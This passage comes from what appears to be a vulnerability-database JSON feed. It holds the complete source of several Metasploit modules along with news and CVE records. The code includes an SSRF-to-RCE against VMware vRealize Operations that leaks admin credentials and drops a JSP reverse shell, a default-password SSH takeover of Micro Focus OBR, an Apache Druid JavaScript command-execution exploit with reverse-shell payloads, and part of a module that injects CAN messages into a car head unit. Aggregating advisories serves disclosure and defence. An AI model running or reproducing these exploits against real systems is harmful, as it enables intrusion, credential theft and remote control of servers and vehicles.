option.conditions.empty?\n next unless Msf::OptCondition.show_option(self, option)\n\n fail_with(Failure::BadConfig, \"The #{name} option is required by the #{action.name} action.\") if datastore[name].blank?\n end\n print_status(' -- Starting action -- ')\n send(\"action_#{action.name.downcase}\")\n end\n\n def action_toggle_radio_mute\n print_status(' -- Mute/umute radio -- ')\n send_in('8351 04')\n end\n\n def action_reduce_radio_volume\n print_status(' -- Reduce radio volume -- ')\n send_out('0112 F4 01')\n end\n\n def action_max_radio_volume\n print_status(' -- Max radio volume -- ')\n send_out('0112 F0')\n end\n\n def action_low_screen_brightness\n print_status(' -- Low screen brightness -- ')\n send_in('8353 07 01')\n end\n\n def action_high_screen_brightness\n print_status(' -- High screen brightness -- ')\n send_in('8353 07 00')\n end\n\n def action_low_fuel_warning\n print_status(' -- Low fuel warning -- ')\n send_in('8353 0B 01')\n end\n\n def action_navigation_full_screen\n print_status(' -- Navigation windows full screen -- ')\n send_in('8353 0C 01')\n end\n\n def action_set_navigation_address\n print_status(' -- Navigation address window pops up -- ')\n send_in('8353 0D 03')\n end\n\n def action_seek_down_search\n print_status(' -- Seek down radio search -- ')\n send_out('133 01')\n end\n\n def action_seek_up_search\n print_status(' -- Seek up radio search -- ')\n send_out('133 02')\n end\n\n def action_switch_on_hu\n print_status(' -- Switch on Head unit -- ')\n send_out('170 01')\n end\n\n def action_switch_off_hu\n print_status(' -- Switch off Head unit -- ')\n send_out('170 00')\n end\n\n def action_camera_reverse_on\n print_status(' -- Parking camera video stream on -- ')\n send_in('8353 03 01')\n end\n\n def action_camera_reverse_off\n print_status(' -- Parking camera video stream off -- ')\n send_in('8353 03 00')\n end\n\n def action_cluster_change_language\n print_status(' -- Korean -- ')\n send_out_custom('4D3 01')\n print_status(' -- Arabic -- ')\n send_out_custom('4D3 08')\n print_status(' -- Polish -- ')\n send_out_custom('4D3 0E')\n print_status(' -- Italian -- ')\n send_out_custom('4D3 12')\n end\n\n def action_cluster_speed_limit\n print_status(' -- Chaning speed limit on the instrument cluster -- ')\n send_out_custom('4DB 00 0A')\n send_out_custom('4DB 00 2A')\n send_out_custom('4DB 00 3A')\n send_out_custom('4DB 00 5A')\n send_out_custom('4DB 00 7A')\n send_out_custom('4DB 00 9A')\n send_out_custom('4DB 00 AA')\n send_out_custom('4DB 00 BA')\n end\n\n def action_cluster_roundabout_faraway\n print_status(' -- km -- ')\n send_out_custom('4D1 66 00 00 00 14 86 10 00')\n print_status(' -- mi -- ')\n send_out_custom('4D1 66 00 00 00 14 86 20 00')\n print_status(' -- ft -- ')\n send_out_custom('4D1 66 00 00 00 14 86 30 00')\n print_status(' -- yd -- ')\n send_out_custom('4D1 66 00 00 00 14 86 40 00')\n print_status(' -- No distance -- ')\n send_out_custom('4D1 66 00 00 00 14 86 50 00')\n end\n\n def action_cluster_random_navigation\n print_status(' -- Calculating the route -- ')\n send_out_custom('4D1 09')\n print_status(' -- Recalculating the route -- ')\n send_out_custom('4D1 0A')\n print_status(' -- Straight ahead -- ')\n send_out_custom('4D1 0D')\n print_status(' -- Exit on the Right -- ')\n send_out_custom('4D1 13')\n print_status(' -- Exit on the Left -- ')\n send_out_custom('4D1 14')\n end\n\n def action_cluster_radio_info\n print_status(' -- USB Music -- ')\n send_out_custom('4D6 65')\n print_status(' -- Android Auto -- ')\n send_out_custom('4D6 6F')\n print_status(' -- FM 168.17 -- ')\n send_out_custom('4D6 11 9D 00 00 00 00 5F 83')\n print_status(' -- FM1 168.17 -- ')\n send_out_custom('4D6 12 9D 00 00 00 00 5F 83')\n print_status(' -- FM2 168.17 -- ')\n send_out_custom('4D6 13 9D 00 00 00 00 5F 83')\n end\n\n def action_inject_custom\n print_status(\" -- Injecting custom payload (#{datastore['CMD_PAYLOAD']}) -- \")\n send_custom(datastore['CMD_PAYLOAD'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/android/local/koffee.rb", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 \nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt"}, {"lastseen": "2021-04-30T15:30:27", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "Micro Focus Operations Bridge Reporter shrboadmin Default Password", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11857"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162407", "href": "https://packetstormsecurity.com/files/162407/Micro-Focus-Operations-Bridge-Reporter-shrboadmin-Default-Password.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'net/ssh' \nrequire 'net/ssh/command_stream' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::SSH \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Micro Focus Operations Bridge Reporter shrboadmin default password', \n'Description' => %q{ \nThis module abuses a known default password on Micro Focus Operations Bridge Reporter. \nThe 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin', \nand allows an attacker to login to the server via SSH. \nThis module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier \nversions are most likely affected too. \nNote that this is only exploitable in Linux installations. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2020-11857' ], \n[ 'ZDI', '20-1215' ], \n[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ], \n[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find' \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ], \n], \n'Privileged' => false, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-09-21' \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(22), \nOptString.new('USERNAME', [true, 'Username to login with', 'shrboadmin']), \nOptString.new('PASSWORD', [true, 'Password to login with', 'shrboadmin']), \n], self.class \n) \n \nregister_advanced_options( \n[ \nOptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]), \nOptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]) \n] \n) \nend \n \ndef rhost \ndatastore['RHOST'] \nend \n \ndef rport \ndatastore['RPORT'] \nend \n \ndef do_login(user, pass) \nfactory = ssh_socket_factory \nopts = { \nauth_methods: ['password', 'keyboard-interactive'], \nport: rport, \nuse_agent: false, \nconfig: false, \npassword: pass, \nproxy: factory, \nnon_interactive: true, \nverify_host_key: :never \n} \n \nopts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] \n \nbegin \nssh = nil \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nssh = Net::SSH.start(rhost, user, opts) \nend \nrescue Rex::ConnectionError \nreturn \nrescue Net::SSH::Disconnect, ::EOFError \nprint_error \"#{rhost}:#{rport} SSH - Disconnected during negotiation\" \nreturn \nrescue ::Timeout::Error \nprint_error \"#{rhost}:#{rport} SSH - Timed out during negotiation\" \nreturn \nrescue Net::SSH::AuthenticationFailed \nprint_error \"#{rhost}:#{rport} SSH - Failed authentication\" \nrescue Net::SSH::Exception => e \nprint_error \"#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}\" \nreturn \nend \n \nif ssh \nconn = Net::SSH::CommandStream.new(ssh) \nssh = nil \nreturn conn \nend \n \nreturn nil \nend \n \ndef exploit \nuser = datastore['USERNAME'] \npass = datastore['PASSWORD'] \n \nprint_status(\"#{rhost}:#{rport} - Attempt to login to the server...\") \nconn = do_login(user, pass) \nif conn \nprint_good(\"#{rhost}:#{rport} - Login Successful (#{user}:#{pass})\") \nhandler(conn.lsock) \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162407/microfocus_obr_shrboadmin.rb.txt"}, {"lastseen": "2021-04-27T15:51:03", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "Apache Druid 0.20.0 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25646"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162345", "href": "https://packetstormsecurity.com/files/162345/Apache-Druid-0.20.0-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Druid 0.20.0 Remote Command Execution', \n'Description' => %q{ \nApache Druid includes the ability to execute user-provided JavaScript code embedded in \nvarious types of requests; however, that feature is disabled by default. \n \nIn Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request \nthat both enables the JavaScript code-execution feature and executes the supplied code all \nat once, allowing for code execution on the server with the privileges of the Druid Server process. \nMore critically, authentication is not enabled in Apache Druid by default. \n \nTested on the following Apache Druid versions: \n \n* 0.15.1 \n* 0.16.0-iap8 \n* 0.17.1 \n* 0.18.0-iap3 \n* 0.19.0-iap7 \n* 0.20.0-iap4.1 \n* 0.20.0 \n* 0.21.0-iap3 \n}, \n'Author' => [ \n'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery \n'je5442804' # Metasploit module \n], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'References' => [ \n['CVE', '2021-25646'], \n['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'], \n['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'], \n['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py'] \n], \n'DisclosureDate' => '2021-01-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Targets' => [ \n[ \n'Linux (dropper)', { \n'Platform' => 'linux', \n'Type' => :linux_dropper, \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' }, \n'CmdStagerFlavor' => %w[curl wget], \n'Arch' => [ARCH_X86, ARCH_X64] \n} \n], \n[ \n'Unix (in-memory)', { \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } \n} \n], \n], \n'DefaultTarget' => 0, \n'Privileged' => false, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8888), \nOptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/']) \n]) \nend \n \ndef execute_command(cmd, _opts = {}) \ngencmd = '/bin/sh`@~-c`@~' + cmd \ngenvar = Rex::Text.rand_text_alpha(8..12) \ngenname = Rex::Text.rand_text_alpha(8..12) \nvprint_status(\"cmd= #{gencmd} var=#{genvar} name=#{genname}\") \npost_data = { \ntype: 'index', \nspec: { \nioConfig: { \ntype: 'index', \nfirehose: { \ntype: 'local', \nbaseDir: '/etc', \nfilter: 'passwd' \n} \n}, \ndataSchema: { \ndataSource: Rex::Text.rand_text_alpha(8..12), \nparser: { \nparseSpec: { \nformat: 'javascript', \ntimestampSpec: {}, \ndimensionsSpec: {}, \nfunction: \"function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"#{gencmd}\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"#{rand(1..9999999)}\\\",#{genname}: #{genvar}}}\", \n\"\": { \nenabled: 'true' \n} \n} \n} \n} \n}, \nsamplerConfig: { \nnumRows: 10 \n} \n}.to_json \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'), \n'ctype' => 'application/json', \n'headers' => { \n'Accept' => 'application/json, text/plain, */*' \n}, \n'data' => post_data \n}) \nend \n \ndef check \ngenecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a') \n \nvprint_status(\"Attempting to execute 'echo #{genecho}' on the target.\") \nres = execute_command(\"echo #{genecho}\") \nunless res \nreturn CheckCode::Unknown('Connection failed.') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe \nend \n \nif res.body.include?(genecho) \nreturn CheckCode::Vulnerable \nend \n \nCheckCode::Unknown('Target does not seem to be running Apache Druid.') \nend \n \ndef exploit \ncase target['Type'] \nwhen :linux_dropper \nexecute_cmdstager \nwhen :unix_memory \nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162345/apache_druid_js_rce.rb.txt"}], "thn": [{"lastseen": "2022-05-09T12:38:23", "description": "[](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-07T08:03:00", "type": "thn", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "modified": "2021-04-07T09:38:17", "id": "THN:4640BEB83FE3611B6867B05878F52F0D", "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T15:00:18", "description": "An Authorization Bypass vulnerability on Micro Focus Operation Bridge Reporter, affecting version 10.40 and earlier. The vulnerability could allow remote attackers to access the OBR host as a non-admin user", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-22T14:15:00", "type": "cve", "title": "CVE-2020-11857", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11857"], "modified": "2021-04-30T23:39:00", "cpe": ["cpe:/a:microfocus:operation_bridge_reporter:10.40"], "id": "CVE-2020-11857", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11857", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:13:17", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-29T20:15:00", "type": "cve", "title": "CVE-2021-25646", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:apache:druid:0.20.0"], "id": "CVE-2021-25646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25646", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:druid:0.20.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:07:45", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21983", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.8", 